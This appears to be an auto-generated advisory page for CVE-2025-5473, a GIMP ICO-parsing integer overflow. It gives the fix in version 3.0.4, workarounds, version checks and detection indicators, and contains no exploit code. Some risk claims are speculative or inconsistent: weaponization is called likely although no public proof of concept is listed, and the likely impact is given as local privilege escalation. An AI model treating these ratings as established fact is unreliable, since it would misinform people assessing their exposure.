CVE-2025-5473 – This vulnerability allows remote attackers to e... (How to Fix)

Q: What is the severity of CVE-2025-5473?

CVE-2025-5473 has a CVSS score of 8.8 (HIGH). This vulnerability allows remote attackers to execute arbitrary code by tricking users into opening malicious ICO files in GIMP. An integer overflow during ICO file parsing enables memory corruption that can lead to remote code execution. All GIMP users who open untrusted ICO files are affected.

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary code by tricking users into opening malicious ICO files in GIMP. An integer overflow during ICO file parsing enables memory corruption that can lead to remote code execution. All GIMP users who open untrusted ICO files are affected.

💻 Affected Systems

Products:

GIMP (GNU Image Manipulation Program)

Versions: Versions prior to 3.0.4

Operating Systems: Linux, Windows, macOS

Default Config Vulnerable: ⚠️ Yes

Notes: All default installations of affected GIMP versions are vulnerable when processing ICO files.

📦 What is this software?

Gimp by Gimp

View all CVEs affecting Gimp →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise with attacker gaining the same privileges as the GIMP user, potentially leading to lateral movement, data theft, or ransomware deployment.

🟠

Likely Case

Local privilege escalation or malware installation on the user's system when opening a malicious ICO file from email, downloads, or web sources.

🟢

If Mitigated

Limited impact if running GIMP with reduced privileges, in sandboxed environments, or with strict file validation policies.

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: MEDIUM

Exploitation requires user interaction (opening malicious file) but no authentication. The vulnerability is well-documented and weaponization is likely given the RCE potential.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: GIMP 3.0.4 and later

Vendor Advisory: https://www.gimp.org/news/2025/05/18/gimp-3-0-4-released/#general-bugfixes

Restart Required: No

Instructions:

1. Download GIMP 3.0.4 or later from official sources. 2. Install the update following standard procedures for your OS. 3. Verify the update completed successfully.

🔧 Temporary Workarounds

Disable ICO file handling

all

Remove or modify file associations to prevent GIMP from automatically opening ICO files

# Linux: Use file manager settings or mime-type configuration
# Windows: Use 'Default Apps' settings to change ICO file association
# macOS: Use 'Get Info' on ICO files to change default application

Run GIMP with reduced privileges

all

Execute GIMP with limited user permissions to contain potential exploitation

# Linux: sudo -u restricted_user gimp
# Windows: Run as standard user (not administrator)
# macOS: Use standard user account

🧯 If You Can't Patch

Implement application whitelisting to block execution of malicious payloads
Use sandboxing solutions to isolate GIMP from critical system resources

🔍 How to Verify

Check if Vulnerable:

Check GIMP version: if earlier than 3.0.4, system is vulnerable

Check Version:

gimp --version

Verify Fix Applied:

Confirm GIMP version is 3.0.4 or later and test opening known-safe ICO files

📡 Detection & Monitoring

Log Indicators:

GIMP crash logs with memory access violations
Unexpected process creation from GIMP
Failed ICO file parsing attempts

Network Indicators:

Downloads of ICO files from suspicious sources
Outbound connections from GIMP process

SIEM Query:

Process Creation where Parent Process Name contains 'gimp' AND Command Line contains unusual parameters

📊 Metadata

CVE ID: CVE-2025-5473

CVSS v3 Score: 8.8 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-190

EPSS Score: 0.27% exploit probability (49.9th percentile)

Published: June 6, 2025

Last Updated: November 3, 2025

🔗 References

https://www.gimp.org/news/2025/05/18/gimp-3-0-4-released/#general-bugfixes Release Notes
https://www.zerodayinitiative.com/advisories/ZDI-25-321/ Third Party Advisory
https://lists.debian.org/debian-lts-announce/2025/10/msg00022.html

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-5473, you might also want to check these: